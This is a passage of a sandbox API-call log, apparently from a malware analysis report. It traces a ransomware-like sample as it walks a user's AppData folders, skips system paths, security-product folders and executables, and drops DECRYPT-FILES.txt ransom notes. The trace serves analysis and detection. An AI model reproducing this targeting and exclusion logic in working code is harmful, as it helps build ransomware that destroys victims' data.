(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\All Users") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.909] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="AhnLab") returned 0x0 [0077.909] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.909] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0077.909] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.909] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\jkbimi8.tmp") returned 108 [0077.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.909] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0077.909] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.909] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\DECRYPT-FILES.txt") returned 114 [0077.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.980] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.981] CloseHandle (hObject=0x464) returned 1 [0077.981] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0077.981] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*" [0077.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaabe2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.982] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaabe2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.982] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.982] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.982] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaabe2a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.982] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.982] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaa25d20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaa25d20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaa25d20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.982] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.982] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.982] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.982] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.982] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.982] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.982] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0077.982] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.982] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" [0077.983] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\jkbimi8.tmp" [0077.983] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.983] CloseHandle (hObject=0x0) returned 0 [0077.983] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.983] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaa25d20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaa25d20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaa25d20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.983] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.984] CloseHandle (hObject=0x460) returned 1 [0077.984] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VRLZOZ0E\\", cAlternateFileName="")) returned 0 [0077.984] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.984] CloseHandle (hObject=0x458) returned 1 [0077.984] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0077.984] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.984] CloseHandle (hObject=0x450) returned 1 [0077.984] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData\\", cAlternateFileName="")) returned 0 [0077.984] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.985] CloseHandle (hObject=0x448) returned 1 [0077.985] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.985] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.985] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.985] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.985] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.985] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.985] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.985] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0077.985] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.985] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" [0077.985] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp" [0077.985] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.986] CloseHandle (hObject=0x0) returned 0 [0077.986] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.986] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x2f5d6350, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x2f5d6350, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0077.986] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0077.986] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0077.986] lstrcatW (in: lpString1="MMC", lpString2="\\" | out: lpString1="MMC\\") returned="MMC\\" [0077.986] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MMC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Program Files") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch=":\\Windows") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Games\\") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.986] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\All Users") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="AhnLab") returned 0x0 [0077.987] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.987] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0077.987] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.987] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\jkbimi8.tmp") returned 72 [0077.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.988] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0077.988] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.988] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\DECRYPT-FILES.txt") returned 78 [0077.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.988] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.989] CloseHandle (hObject=0x44c) returned 1 [0077.989] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0077.989] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0077.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.990] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.990] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.990] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.990] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.990] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.990] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.990] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.990] lstrcmpiW (lpString1="tmp", 